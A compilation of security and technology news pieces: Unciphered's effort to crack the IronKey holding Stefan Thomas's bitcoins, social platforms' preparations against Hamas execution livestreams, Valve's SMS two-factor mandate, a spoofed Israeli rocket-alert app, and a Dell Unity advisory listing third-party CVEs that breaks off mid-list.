Stefan Thomas lost the password to an encrypted USB drive holding 7,002 bitcoins. One team of hackers believes they can unlock it—if they can get Thomas to let them.

At 9:30 am on a Wednesday in late September, a hacker who asked to be called Tom Smith sent me a nonsensical text message: “query voltage recurrence.”

Those three words were proof of a remarkable feat—and potentially an extremely valuable one. A few days earlier, I had randomly generated those terms, set them as the passphrase on a certain model of encrypted USB thumb drive known as an IronKey S200, and shipped the drive across the country to Smith and his teammates in the Seattle lab of a startup called Unciphered.

Unciphered’s staff in the company’s Seattle lab.

Photograph: Meron Menghistab

Smith had told me that guessing my passphrase might take several days. Guessing it at all, in fact, should have been impossible: IronKeys are designed to permanently erase their contents if someone tries just 10 incorrect password guesses. But Unciphered's hackers had developed a secret IronKey password-cracking technique—one that they've still declined to fully describe to me or anyone else outside their company—that gave them essentially infinite tries. My USB stick had reached Unciphered’s lab on Tuesday, and I was somewhat surprised to see my three-word passphrase texted back to me the very next morning. With the help of a high-performance computer, Smith told me, the process had taken only 200 trillion tries.

Smith’s demonstration was not merely a hacker party trick. He and Unciphered’s team have spent close to eight months developing a capability to crack this specific, decade-old model of IronKey for a very particular reason: They believe that in a vault in a Swiss bank 5,000 miles to the east of their Seattle lab, an IronKey that's just as vulnerable to this cracking technique holds the keys to 7,002 bitcoins, worth close to $235 million at current exchange rates.

For years, Unciphered's hackers and many others in the crypto community have followed the story of a Swiss crypto entrepreneur living in San Francisco named Stefan Thomas, who owns this 2011-era IronKey, and who has lost the password to unlock it and access the nine-figure fortune it contains. Thomas has said in interviews that he's already tried eight incorrect guesses, leaving only two more tries before the IronKey erases the keys stored on it and he loses access to his bitcoins forever.

Screens in Unciphered’s lab show a microscopic image of the layout of the IronKey’s controller chip (left) and a CT scan of the drive.

Photograph: Meron Menghistab

Now, after months of work, Unciphered's hackers believe they can open Thomas' locked treasure chest, and they're ready to use their secret cracking technique to do it. “We were hesitant to reach out to him until we had a full, provable, reliable attack,” says Smith, who asked WIRED not to reveal his real name due to the sensitivities of working with secret hacking techniques and very large sums of cryptocurrency. “Now we’re in that place.”

The only problem: Thomas doesn't seem to want their help.

Earlier this month, not long after performing their USB-decrypting demonstration for me, Unciphered reached out to Thomas through a mutual associate who could vouch for the company’s new IronKey-unlocking abilities and offer assistance. The call didn't even get as far as discussing Unciphered's commission or fee before Thomas politely declined.

Thomas had already made a “handshake deal” with two other cracking teams a year earlier, he explained. In an effort to prevent the two teams from competing, he had offered each a portion of the proceeds if either one could unlock the drive. And he remains committed, even a year later, to giving those teams more time to work on the problem before he brings in anyone else—even though neither of the teams has shown any sign of pulling off the decryption trick that Unciphered has already accomplished.

That has left Unciphered in a strange situation: It holds what is potentially one of the most valuable lockpicking tools in the cryptocurrency world, but with no lock to pick. “We cracked the IronKey,” says Nick Federoff, Unciphered's director of operations. “Now we have to crack Stefan. This is turning out to be the hardest part.”

In an email to WIRED, Thomas confirmed that he had turned down Unciphered's offer to unlock his encrypted fortune. “I have already been working with a different set of experts on the recovery so I'm no longer free to negotiate with someone new,” Thomas wrote. “It's possible that the current team could decide to subcontract Unciphered if they feel that's the best option. We'll have to wait and see.” Thomas declined to be interviewed or to comment further.

A Very Valuable, Worthless USB Stick

In past interviews, Thomas has said that his 7,002 bitcoins were left over from a payment he received for making a video titled “What is Bitcoin?” that published on YouTube in early 2011, when a bitcoin was worth less than a dollar. Later that year, he told WIRED that he'd inadvertently erased two backup copies of the wallet that held those thousands of coins, and then lost the piece of paper with the password to decrypt the third copy, stored on the IronKey. By then, his lost coins were worth close to $140,000. “I spent a week trying to recover it,” he said at the time. “It was pretty painful.”

In the 12 years since, the value of the inaccessible coins on Thomas' IronKey has at times swelled to be worth nearly half a billion dollars, before settling to its current, still-staggering price. In January 2021, as Bitcoin began to approach its peak exchange rate, Thomas described to _The New York Times_ the angst that his long-lost hoard had caused him over the years. “I would just lay in bed and think about it,” he said. “Then I would go to the computer with some new strategy, and it wouldn’t work, and I would be desperate again.”

Around that same time in 2021, a team of cryptographers and white-hat hackers founded Unciphered with the goal of unlocking exactly the sort of vast, frozen funds that many unlucky crypto holders like Thomas have long since given up on. At the time of Unciphered’s official launch, the cryptocurrency tracing firm Chainalysis estimated the total sum of those forgotten wallets across blockchains to be worth $140 billion. Unciphered says it has since successfully helped clients open locked wallets worth “many millions” of dollars—often through novel cryptographic vulnerabilities or software flaws it has discovered in cryptocurrency wallets—though nothing close to the size of Thomas' IronKey stash.

A deconstructed IronKey inside of Unciphered’s laser cutting tool.

Photograph: Meron Menghistab

Only around the beginning of 2023 did Unciphered begin to hunt for potential avenues to unlock Thomas' IronKey prize. Smith says that they quickly started to see hints that the IronKey's manufacturer, which was sold to storage hardware firm iMation in 2011, had left them some potential openings. “We were seeing little bits and pieces,” Smith says. “Like, this looks a little sloppy, or this looks not quite like how someone should be doing things.” (Kingston Storage, which now owns IronKey, didn’t respond to WIRED’s request for comment.)

Even a decade-old IronKey is a daunting target for hackers. The USB stick, whose development was funded in part by the United States Department of Homeland Security, is FIPS-140-2 Level 3 certified, meaning it's tamper-resistant and its encryption is secure enough for use by military and intelligence agencies for classified information. But emboldened by the few hints of security flaws they'd found—and still with no participation from Thomas—Unciphered's founders decided to take on the project of cracking it. “If there is an Everest to attempt, this is it,” Federoff remembers telling the team. The company's founders would eventually pull together a group of around 10 staffers and outside consultants, several of whom had backgrounds at the National Security Agency or other three-letter government agencies. They called it Project Everest.

A $235 Million Treasure Hunt

One of their first moves was to determine the exact model of IronKey that Thomas must have used, based on timing and a process of elimination. Then they bought the entire supply of that decade-plus-old model that they could find available for sale online, eventually amassing hundreds of them in their lab.

To fully reverse engineer the device, Unciphered scanned an IronKey with a CT scanner, then began the elaborate surgery necessary to deconstruct it. Using a precise laser cutting tool, they carved out the Atmel chip that serves as the USB stick's “secure enclave” holding its cryptographic secrets. They bathed that chip in nitric acid to “decap” it, removing the layers of epoxy designed to prevent tampering. They then began to polish down the chip, layer by layer, with an abrasive silica solution and a tiny spinning felt pad, removing a fraction of a micron of material from its surface at a time, taking photos of each layer with either optical microscopes or scanning electron microscopes, and repeating the process until they could build a full 3D model of the processor.

Because the chip's read-only memory, or ROM, is built into the layout of its physical wiring for better efficiency, Unciphered's visual model gave it a head start toward deciphering much of the logic of the IronKey's cryptographic algorithm. But the team went much further, attaching tenth-of-a-millimeter gauge wires to the secure element’s connections to “wiretap” the communications going into and out of it. They even tracked down engineers who had worked on the Atmel chip and another microcontroller in the IronKey that dated back to the 1990s to quiz them for details about the hardware. “It felt very much like a treasure hunt," says Federoff. “You’re following a map that’s faded and coffee-stained, and you know there’s a pot of gold at the end of a rainbow, but you have no idea where that rainbow’s leading.”

That cracking process culminated in July, when Unciphered's team gathered at an Airbnb in San Francisco. They describe standing around a table covered with millions of dollars’ worth of lab equipment when a member of the team read out the contents of a decrypted IronKey for the first time. “What just happened?” Federoff asked the room. “We just summited Everest,” said Unciphered's CEO, Eric Michaud.

Unciphered still won't reveal its full research process, or any details of the technique it ultimately found for cracking the IronKey and defeating its “counter” that limits password guesses. The company argues that the vulnerabilities they discovered are still potentially too dangerous to be made public, given that the model of IronKeys it cracked are too old to be patched with a software update, and some may still store classified information. “If this were to leak somehow, there would be much bigger national security implications than a cryptocurrency wallet,” Federoff says.

The team notes that the final method they developed doesn't require any of the invasive or destructive tactics that they used in their initial research. They've now unlocked 2011-era IronKeys—without destroying them—more than a thousand times, they say, and unlocked three IronKeys in demonstrations for WIRED.

Cryptic Contracts

None of that, however, has gotten them any closer to persuading Stefan Thomas to let them crack _his_ IronKey. Unciphered’s hackers say they learned from the intermediary who contacted Thomas on their behalf that Thomas has already been in touch with two other potential players in the crypto- and hardware-hacking world to help unlock his USB stick: the cybersecurity forensics and investigations firm Naxo, and the independent security researcher Chris Tarnovsky.

Naxo declined WIRED’s request to comment. But Chris Tarnovsky, a renowned chip reverse engineer, confirmed to WIRED that he had a “meet-and-greet” call with Thomas in May of last year. Tarnovsky says that, in the meeting, Thomas had told him that if he could successfully unlock the IronKey, he would be "generous," but didn't specify a fee or commission. Since then, Tarnovsky says that he has done very little work on the project, and that he has essentially been waiting for Thomas to start paying him on a monthly basis for initial research. "I want Stefan to cough up some money up front," says Tarnovsky. “It's a lot of work, and I need to worry about my mortgage and my bills.”

But Tarnovsky says he hasn't heard from Thomas since that first call. “Nothing came out of it,” he says. “It's weird.”

Unciphered’s director of operations Nick Federoff.

Photograph: Meron Menghistab

Unciphered's team remains skeptical about Naxo’s progress and whether it’s any further along than Tarnovsky. There are only a small number of hardware hackers capable of the reverse engineering necessary to crack the IronKey, they argue, and none appear to be working with Naxo. As for Thomas' suggestion that they could subcontract to Naxo or another team working on the project, Unciphered's Federoff says he won't rule it out, but argues it doesn't make sense when Unciphered alone can crack the IronKey. “Based on what we know, we don't see any benefit to anyone in going that route,” Federoff says.

Thomas, meanwhile, seems to display an unusual lack of urgency in unlocking his $235 million, and has offered only vague hints about why he has yet to reveal any progress toward that goal. “When you're dealing with so much money, everything takes forever,” he told the _Thinking Crypto_ podcast in an interview over the summer. “The person you're working with, you need some contract with them, and that contract needs to be rock solid, because if there's some issue with the contract, there's suddenly hundreds of millions of dollars at stake.”

To potentially accelerate that cryptic contract process, Unciphered plans to publish an open letter to Thomas and a video in the coming days designed to persuade—or pressure—Thomas into working with them. But Federoff concedes that it's possible Thomas doesn't actually care about the money: In its piece about his locked coins in 2021, _The New York Times_ wrote that Thomas already had “more riches than he knows what to do with,” thanks to other crypto ventures.

Federoff notes that it's impossible to know for certain what Thomas' IronKey holds. Maybe the keys to the 7,002 bitcoins are held elsewhere, or gone altogether.

He says Unciphered is still hopeful. But the team is also ready to move on if Thomas won't work with them. There are, after all, other locked wallets out there for the company to crack. And the decision of whether and how to unlock this particular USB drive's riches will ultimately fall to its owner alone. “It's incredibly frustrating,” says Federoff. “But when you're dealing with people, that's always the most complex part. Code doesn't change unless you tell it to. Circuitry doesn't either. But humans are incredibly unpredictable creatures.”

They Cracked the Code to a Locked USB Drive Worth $235 Million in Bitcoin. Then It Got Weird

Hamas has threatened to broadcast videos of hostage executions. With the war between Israel and Hamas poised to enter a new phase, are social platforms ready?

For the past decade, social media platforms have struggled to stop the spread of extremist violence livestreamed on their platforms. Now they face a much different problem: This time, they know what’s coming.

In the days after Hamas attacked Israel on October 7, the group’s military wing said it would kill an Israeli hostage every time Israel launched an attack on Gaza. Abu Obeida, a spokesperson for the al-Qassam Brigades, added that these executions would be broadcast “in audio and video.” As of today, Hamas is holding 220 people hostage, according to the Israel Defense Forces.

Amid the October 7 attack, one person livestreamed footage showing Hamas fighters murdering Israeli citizens—a clip of which was later shared by Donald Trump Jr. on X. And in the days after the attack, Hamas hijacked the accounts of those hostages on platforms like Facebook and Instagram to livestream attacks and issue death threats.

In response, tech companies appeared to take things seriously.

Meta launched a “special operations center” to track content on Facebook, Instagram, and Threads. TikTok activated its “command center.” X (formerly Twitter) mobilized its “cross-company leadership group.” YouTube activated its “intelligence desk.” And Reddit tells WIRED its “safety team” is on alert.

But when WIRED asked for specific details about how they are going to prevent bad actors from weaponizing the platforms’ livestreaming capabilities, none of the companies offered any specific details, instead pointing to their general online guidance about livestreaming policies, if they responded at all. For example, Meta directed WIRED to a 2019 blog post from chief information security officer Guy Rosen about how the company was planning to curb the use of its livestream products in the wake of the Christchurch massacre, during which a gunman killed 51 people at a mosque in New Zealand in March of that year.

Despite the press releases indicating all-hands-on-deck attention to the livestreaming problem, industry experts say social media companies are showing a lack of transparency and an unwillingness to take the measures needed to prevent execution videos from spreading on their platforms, such as suspending livestreaming capabilities completely during the Israel-Hamas war.

“Hamas’ threats to execute these people on livestreams is happening because it’s possible for them to broadcast it,” Imran Ahmed, the founder and CEO of Center for Countering Digital Hate, a nonprofit that tracks hate speech on social platforms, tells WIRED. “They’re doing this for the spectacle because it terrorizes us. If we took away their ability to generate that spectacle, would they be doing this? What comes first, the livestream or the execution?”

Ahmed alleges that the companies are failing to implement systems that automatically detect violent extremist content as effectively as they detect some other kinds of content. “If you have a snatch of copyrighted music in your video, their systems will detect it within a microsecond and take it down,” Ahmed says, adding that “the fundamental human rights of the victims of terrorist attacks” should carry as much urgency as the “property rights of music artists and entertainers.”

The lack of details about how social platforms plan to curb the use of livestreams is, in part, because they are concerned about giving away too much information, which may allow Hamas, Palestinian Islamic Jihad (PIJ), and other militant groups or their supporters to circumvent the measures that are in place, an employee of a major platform who was granted anonymity because they are not authorized to speak publicly claimed in a communication with WIRED.

Adam Hadley, founder and executive director of Tech Against Terrorism, a United Nations-affiliated nonprofit that tracks extremist activity online, tells WIRED that while maintaining secrecy around content moderation methods is important during a sensitive and volatile conflict, tech companies should be more transparent about how they work.

“There has to be some degree of caution in terms of sharing the details of how this material is discovered and analyzed,” Hadley says. “But I would hope there are ways of communicating this ethically that don’t tip off terrorists to detection methods, and we would always encourage platforms to be transparent about what they’re doing.”

The social media companies say their dedicated teams are working around the clock right now as they await the launch of Israel’s expected ground assault in Gaza, which Hadley believes could trigger a spate of hostage executions.

And yet, for all of the time, money, and resources these multibillion-dollar companies appear to be putting into tackling this potential crisis, they are still reliant on Tech Against Terrorism, a tiny nonprofit, to alert them when new content from Hamas or PIJ, another paramilitary group based in Gaza, is posted online.

Hadley says his team of 20 typically knows about new terrorist content before any of the big platforms. So far, while tracking verified content from Hamas’ military wing or the PIJ, Hadey says the volume of content on the major social platforms is “very low.”

“Examples that we can find on large platforms of that official content are in the thousands, so not a lot of examples, compared with significantly more on Telegram,” Hadley says. “We are sharing alerts to 60 platforms who have been implicated with \[Hamas\] and PIJ content to date, but very low volumes are present.”

Hamas is banned on Facebook, Instagram, YouTube, and TikTok, so it has typically not used these mainstream platforms to any great extent, though X said earlier this month that it had removed hundreds of Hamas-affiliated accounts. Instead, Hamas prefers to use Telegram.

“Because the use of Telegram is so widespread and simple, we will assume they will continue to do this because terrorists prioritize platforms they can use most easily,” Hadley says, “and why would they bother with anything other than Telegram?”

Meta, X, and YouTube collaborate to share information about what they are seeing on the platforms. Telegram does not take part in such partnerships. While it has blocked some channels in certain jurisdictions, Telegram has typically taken a hands-off approach to content moderation, meaning Hamas and related groups have been mostly free to post whatever content they like on its platform.

Telegram did not respond to WIRED’s questions about how it would deal with execution videos on its platform, nor did X or Twitch. Discord declined to provide an on-the-record comment.

While Hadley sees Telegram as the primary concern, mainstream platforms are still at risk of facilitating the spread of this content. Videos can easily be downloaded from Telegram and reposted on any other platform, which is where the mainstream social media networks face the challenge of stopping them.

When asked to provide more details about their efforts, Meta and TikTok directed WIRED to their policy pages outlining the work they are doing to prevent the spread of these videos. YouTube spokesperson Jack Malon tells WIRED that “our teams are working around the clock to monitor for harmful footage across languages and locales.” A Reddit spokesperson says the company has “dedicated teams with linguistic and subject-matter expertise actively monitoring the conflict and continuing to enforce Reddit’s Content Policy across the site.”

One of the key ways that tech companies try to keep violent extremist content from going viral on their platforms is by using what are known as hashing databases. When content from a terrorist organization is identified, it is “hashed” to create a unique identifier that can then be shared among all companies to automatically prevent that video or image from being reshared elsewhere.

The sharing of these hashes and communication around incidents like the Israel-Hamas war are coordinated by the Global Internet Forum to Counter Terrorism (GIFCT), a small team of experts whose mission is to stop tech platforms from being exploited by violent extremists. The group was founded in 2017 by Facebook, Microsoft, X (then Twitter), and YouTube as a way of centralizing and coordinating the sharing of information. Companies like Dropbox, Amazon, Pinterest, and Zoom also provide funding to the group.

GIFCT did not provide a spokesperson to answer WIRED’s questions, but a statement on the group’s website says it is “providing regular situational awareness across member companies and support in addressing content relating to this conflict that violates their platform policies.”

Even when mainstream platforms have access to a shared database of verified terrorist content and centralized communications with experts who are tracking this content closely, they still have a lot of work to do in order to prevent violent videos from spreading on their platforms.

“This will be a big litmus test for the mainstream platforms,” Hadley says. “We would expect their algorithmic systems to be able to detect the \[Hamas\] logo, for instance, and respond accordingly. So actually, we’re quietly confident that those platforms will be alright to handle it. And I would hope that they’ve been training their algorithms in anticipation of this, based on the very large amounts of existing content from \[Hamas and PIJ\]. But unfortunately, we have no insight into that at all.”

The Hamas Threat of Hostage Execution Videos Looms Large Over Social Media

Despite warnings that sending one-time passwords via text messages is a flawed security measure, companies continue to roll out the approach, especially in consumer-facing applications.

Following a spate of attacks targeting independent developers on its Steam game-distribution platform, game maker Valve last week said that it will require developers to provide their phone numbers so the company can use SMS for two-factor authentication (2FA) starting Oct. 24. 

"As part of a security update, any Steamworks account setting that builds live on the default/public branch of a released app will need to have a phone number associated with their account, so that Steam can text you a confirmation code before continuing," the company stated in its notification. "We also plan on adding this requirement for other Steamworks actions in the future."

But since SMS-based two-factor authentication can be circumvented by persistent attackers using a variety of methods, the move raises the question: Why are consumer-facing online services still making SMS the go-to second factor, both internally and for customers?

**SMS-Based 2FA: Not Really Secure**

Getting around SMS two-factor authentication has become a priority among attackers, and indeed, it has been defeated using everything from machine-in-the-middle attacks to social engineering — including, in the infamous Uber breach case, through 2FA fatigue attacks. 

In 2022, for example, a banking Trojan known as Xenomorph compromised more than 50,000 Android devices after the cybercriminal group behind the malware disguised it as a performance utility, according to Tony Anscombe, chief security evangelist for digital security firm ESET.

"In reality, it was stealing the user’s login credentials for banking, payment, social media, cryptocurrency and other apps that have valuable personal information," he says. "The malware abused more than 50 apps, including PayPal and Coinbase, and included the ability to intercept messages and notifications, giving the cybercriminal the ability to bypass two-factor authentication codes.

But even the low-tech approach of just walking into a cellular store (SIM-swapping) or finding a corrupt technician works well, says David Richardson, vice president of endpoint and threat intelligence at cloud security platform Lookout. All an attacker has to do is know the targeted individual's phone number to attack the channel.

"The whole system is basically built on an assumption of trust — I could walk into any store and easily cancel my contract and port my phone number ... to pretty much any carrier," he says. "Basically \[an attacker could\] take over any phone number and start to receive the phone calls and, most importantly in these cases, the SMS messages that are that are going to those to those numbers."

And cellphone numbers are some of the most commonly leaked information on the Internet. The recent compromises of MGM Resorts and Caesars Entertainment, for example, exposed millions of records of business professionals and individual consumers, including phone numbers, which could be used by attackers for further attacks. 

**2FA Is Better Than Nothing**

SMS-based 2FA persists in the face of the insecurity for the simple reason that it's a relatively painless security mechanism for end users: A company merely needs to know is the customer's phone number to text a one-time passcode for authentication. For consumer-facing companies, reducing friction is the name of the game.

At the same time, making attackers' jobs even just a little bit more difficult helps protect developers — and the players of their games.

"Any MFA is better than no MFA — like, vastly superior," Lookout's Richardson says. "You're 10 times harder to hack if you've got an SMS-based MFA, so ... you're way better off having some form of multifactor authentication versus no form of multifactor authentication."

An SMS code could have protected Benoît Freslon, the independent developer behind the game NanoWar: Cells VS Virus, for example. Freslon fell prey to a social engineering scam, apparently when cybercriminals posing as another developer sent him a direct message with malicious content, according to a statement posted on Steam's Community forums.

"I was hacked, all my social networks accounts including Discord and Steam were compromised ... \[t\]he hacker uploaded a malware with \[sic\] my account," a developer stated on Steam's forums. "Be careful when a friend ask you to test his game on private message on Discord. ... It was the most stressfull days \[sic\] of my indie developer life."

Valve removed the game from Steam on Aug. 25, a day after the group behind the hacks published the infected version from the developer's account. The game developer stressed that a safe version of the game has been available since Sept. 15, uploaded from a "totally clean machine."

**SMS: A Good First Step, but...**

Companies focused on consumers and worried that the additional friction posed by 2FA security could use app-based factors that are already widely adopted, such as Google's or Microsoft's authenticators, says ESET's Anscombe.

"Many consumer-focused companies already provide the option to use either Microsoft or Google authenticator apps, this reduces the barrier to adoption as consumers may already have these apps installed," he says. 

"An app is not subject to SIM cloning nor malware that uses the operating systems permissions system to read SMS messages," he says. "The app itself should be protected by a passkey or biometrics adding an additional layer of security."

Boosting security has become important for game companies, as users have more digital in-game assets stored in online accounts that cybercriminals aim to monetize, and while cheaters look to access other gamers' accounts to gain advantage. Steam expects to roll out more security measures in the future to better protect, not only the developers but its customers and reputation.

Valve's 2FA Mandate for Game Developers Shows SMS Stickiness

A spoofed version of an Israeli rocket-attack alerting app is targeting Android devices, in a campaign that shows how cyber-espionage attacks are shifting to individual, everyday citizens.

Using a trending item as a malicious lure is relatively common; to do it in a period of military conflict and deliberately target users in the affected region is a different step.

Recently, a genuine app — RedAlert - Rocket Alerts — has been popular among users in the Israel and Gaza region, since it allows individuals to receive timely and precise alerts about incoming airstrikes. However, a malicious, spoofed version of the app was detected last week, which collected personal information including access to contacts, call logs, SMS, account information, and an overview of other installed apps.

This and the discovery of a similar incident indicates that unfortunately, the Israel-Hamas conflict's cybercrimes will extend beyond nation-state attacks on critical infrastructure — and into the palm of the user's hand.

**The Initial Malicious App**

According to the discovery by Cloudflare, the website hosting the malicious file was created on Oct. 12, and it has been taken offline since. Only those users who installed the Android version of the app are impacted, and they are urgently advised to delete the app.

A statement from Cloudflare said it became aware of a website hosting a Google Android Application that impersonated the legitimate RedAlert - Rocket Alerts application. "Given the current climate in Israel, this application is heavily relied upon by individuals living in the country to be notified when it is critical to seek safety," it said.

The creation of a malicious app spoofing a known brand is common, according to a recent report from Arctic Wolf, which said malicious apps found in official app stores are often disguised with the use of names, images, or descriptions similar to popular or malware-free apps. They also may have fake reviews to help increase the malicious app's rating and to make them look more realistic.

But in this case, the malicious application mimicked a widely used app to steal data, in what Cloudflare called "a time of distress" where services such as this are replied upon, adding that this is "another example of threat attackers leveraging authenticity to carry out impactful attacks."

Casey Ellis, founder and CTO of Bugcrowd, says he does expect to see more cases like this where the Gaza conflict is used as a malware lure — both regionally and globally.

"Attackers are always on the lookout for events that create fear, uncertainty, and a volatile information environment, and the Israel-Hamas conflict definitely meets these criteria," he says.

Cloudflare was unable to add attribution to whoever was behind this malicious app, and there is no evidence that this was even a threat actor from the Middle East. So this could be the work of an unrelated cybercriminal looking to use the conflict for their malicious gain.

**More Than One Incident**

In a separate detection, Cloudflare said the pro-Palestinian hacktivist group AnonGhost exploited a vulnerability in another application, Red Alert: Israel. This allowed the group to intercept requests, expose servers and APIs, and send fake alerts to some app users, including a message that a nuclear bomb strike was imminent.

In its detection of that incident, Group-IB Threat Intelligence said this shows that the actions of attackers can be diverse, as hacktivists are generally associated with conducting small-scale DDoS attacks and defacement. But as the ongoing conflict shows, sometimes their actions can be far more devastating and costly, and "it's essential to map and properly mitigate the risk of hacktivism as part of a threat intelligence program."

Krishna Vishnubhotla, vice president of product strategy at Zimperium, says spoofing mobile apps is easy, as many app teams are inadvertently giving threat actors a blueprint for abuse.

He says, "App teams focus on code optimization and speed to market, but never ensure sufficient threat visibility and protection for their apps once they are published. Threat actors know this and use reverse engineering to truly understand an app's inner workings."

Vishnubhotla adds, "Knowing an application's architecture, data flow, and security mechanisms allows a hacker to easily create spoofed apps."

**Be Careful With Clicks**

The advice to avoid becoming victimized by these types of attacks is fairly straightforward. Arctic Wolf recommend checking the app's developers and reviews, restricting permissions when necessary; users should download apps only from reputable developers and look for mentions of scams or malicious activity mentioned in reviews by other users.

The advice from Group-IB was for organizations to carefully examine and fortify all Web-facing applications, as "it's not uncommon for hacktivists to exploit web and mobile APIs, often perceived as softer targets compared to the principal product APIs."

Ellis admits his advice on protection from malicious apps — saying users should trust, but verify — is nothing groundbreaking, but it persists for a reason.

"Double-check before you trust anything that offers to assist you in issues of personal safety, and triple-check before you share it with others," he says. He acknowledges that in this case, the malicious apps were downloaded by people in a state of concern and potentially without the due consideration they would usually give to vetting them.

Malicious Apps Spoof Israeli Attack Detectors: Conflict Goes Mobile


Dell Unity 5.3 contain(s) an Arbitrary File Creation vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability by crafting arbitrary files through a request to the server.



**Impact**

Critical

**Details**

Third-party Component

CVEs

More information

open-vm-tools

CVE-2022-31676

https://www.suse.com/security/cve/CVE-2022-31676.html

postgresql-jdbc

CVE-2022-41946

https://www.suse.com/security/cve/CVE-2022-41946.html

bind

CVE-2021-25220

https://www.suse.com/security/cve/CVE-2021-25220.html

libstdc

CVE-2020-13844, CVE-2019-15847, CVE-2019-14250

https://www.suse.com/security/cve/CVE-2020-13844.html, https://www.suse.com/security/cve/CVE-2019-15847.html, https://www.suse.com/security/cve/CVE-2019-14250.html

ntp

CVE-2020-15025, CVE-2020-13817, CVE-2018-8956, CVE-2020-11868

https://www.suse.com/security/cve/CVE-2020-15025.html, https://www.suse.com/security/cve/CVE-2020-13817.html, https://www.suse.com/security/cve/CVE-2018-8956.html, https://www.suse.com/security/cve/CVE-2020-11868.html

runc

CVE-2022-31030, CVE-2022-29162

https://www.suse.com/security/cve/CVE-2022-31030.html, https://www.suse.com/security/cve/CVE-2022-29162.html

sysstat

CVE-2019-16167, CVE-2018-19517, CVE-2018-19416

https://www.suse.com/security/cve/CVE-2019-16167.html, https://www.suse.com/security/cve/CVE-2018-19517.html, https://www.suse.com/security/cve/CVE-2018-19416.html

cpio

CVE-2021-38185

https://www.suse.com/security/cve/CVE-2021-38185.html

dnsmasq

CVE-2020-25687, CVE-2020-25686, CVE-2020-25682, CVE-2020-25681, CVE-2020-25685, CVE-2020-25684, CVE-2020-25683, CVE-2022-0934, CVE-2021-3448

https://www.suse.com/security/cve/CVE-2020-25687.html, https://www.suse.com/security/cve/CVE-2020-25686.html, https://www.suse.com/security/cve/CVE-2020-25682.html, https://www.suse.com/security/cve/CVE-2020-25681.html, https://www.suse.com/security/cve/CVE-2020-25685.html, https://www.suse.com/security/cve/CVE-2020-25684.html, https://www.suse.com/security/cve/CVE-2020-25683.html, https://www.suse.com/security/cve/CVE-2022-0934.html, https://www.suse.com/security/cve/CVE-2021-3448.html

git

CVE-2022-29187, CVE-2022-24765

https://www.suse.com/security/cve/CVE-2022-29187.html, https://www.suse.com/security/cve/CVE-2022-24765.html

krb5

CVE-2021-3672

https://www.suse.com/security/cve/CVE-2021-3672.html

Dbus

CVE-2020-35512, CVE-2020-12049

https://www.suse.com/security/cve/CVE-2020-35512.html, https://www.suse.com/security/cve/CVE-2020-12049.html

mozilla

CVE-2022-31741, CVE-2015-20107, CVE-2021-3572, CVE-2020-26116, CVE-2019-11324, CVE-2019-11236, CVE-2019-9740, CVE-2018-20060, CVE-2018-18074

https://www.suse.com/security/cve/CVE-2022-31741.html, https://www.suse.com/security/cve/CVE-2015-20107.html, https://www.suse.com/security/cve/CVE-2021-3572.html, https://www.suse.com/security/cve/CVE-2020-26116.html, https://www.suse.com/security/cve/CVE-2019-11324.html, https://www.suse.com/security/cve/CVE-2019-11236.html, https://www.suse.com/security/cve/CVE-2019-9740.html, https://www.suse.com/security/cve/CVE-2018-20060.html, https://www.suse.com/security/cve/CVE-2018-18074.html

root user

CVE-2019-5021

https://www.suse.com/security/cve/CVE-2019-5021.html

xstream

CVE-2021-21342

https://www.suse.com/security/cve/CVE-2021-21342.html

dom4j

CVE-2020-10683

https://www.suse.com/security/cve/CVE-2020-10683.html

vim

CVE-2021-3973

https://www.suse.com/security/cve/CVE-2021-3973.html

tomcat

CVE-2022-25762, CVE-2022-23181

https://www.suse.com/security/cve/CVE-2022-25762.html, https://www.suse.com/security/cve/CVE-2022-23181.html

apache2

CVE-2022-26373, CVE-2022-26377, CVE-2022-28614, CVE-2022-28615, CVE-2022-29404, CVE-2022-30522, CVE-2022-31813, CVE-2022-30556

https://www.suse.com/security/cve/CVE-2022-26373.html, https://www.suse.com/security/cve/CVE-2022-26377.html, https://www.suse.com/security/cve/CVE-2022-28614.html, https://www.suse.com/security/cve/CVE-2022-28615.html, https://www.suse.com/security/cve/CVE-2022-29404.html, https://www.suse.com/security/cve/CVE-2022-30522.html, https://www.suse.com/security/cve/CVE-2022-31813.html, https://www.suse.com/security/cve/CVE-2022-30556.html

libopenssl-1\_1

CVE-2022-1292

https://www.suse.com/security/cve/CVE-2022-1292.html

avahi

CVE-2021-26720, CVE-2021-3468

https://www.suse.com/security/cve/CVE-2021-26720.html   , https://www.suse.com/security/cve/CVE-2021-3468.html

Libgcrypt

CVE-2021-33560

https://www.suse.com/security/cve/CVE-2021-33560.html

Libnettle

CVE-2021-3580

https://www.suse.com/security/cve/CVE-2021-3580.html

pcre2

CVE-2022-1587, CVE-2019-20454

https://www.suse.com/security/cve/CVE-2022-1587.html, https://www.suse.com/security/cve/CVE-2019-20454.html

Cyrus

CVE-2022-24407

https://www.suse.com/security/cve/CVE-2022-24407.html

libopenssl-1\_1

CVE-2022-2097, CVE-2022-2068

https://www.suse.com/security/cve/CVE-2022-2097.html, https://www.suse.com/security/cve/CVE-2022-2068.html

apache-commons-httpclient

CVE-2020-13956

https://www.suse.com/security/cve/CVE-2020-13956.html

openssh

CVE-2021-41617

https://www.suse.com/security/cve/CVE-2021-41617.html

e2fsprogs

CVE-2022-1304

https://www.suse.com/security/cve/CVE-2022-1304.html

containerd, docker

CVE-2021-43565, CVE-2022-27191, CVE-2022-24769, CVE-2022-23648

https://www.suse.com/security/cve/CVE-2021-43565.html, https://www.suse.com/security/cve/CVE-2022-27191.html, https://www.suse.com/security/cve/CVE-2022-24769.html, https://www.suse.com/security/cve/CVE-2022-23648.html

ucode-intel

CVE-2022-21151  

https://www.suse.com/security/cve/CVE-2022-21151.html

openjdk

CVE-2022-21476, CVE-2022-21426, CVE-2022-21496, CVE-2022-21496, CVE-2022-21434, CVE-2022-21443

https://www.suse.com/security/cve/CVE-2022-21476.html, https://www.suse.com/security/cve/CVE-2022-21426.html, https://www.suse.com/security/cve/CVE-2022-21496.html, https://www.suse.com/security/cve/CVE-2022-21496.html, https://www.suse.com/security/cve/CVE-2022-21434.html, https://www.suse.com/security/cve/CVE-2022-21443.html

tiff

CVE-2022-0909, CVE-2022-0908, CVE-2022-0562, CVE-2022-0561, CVE-2022-0891, CVE-2022-0865, CVE-2022-1056, CVE-2022-0924

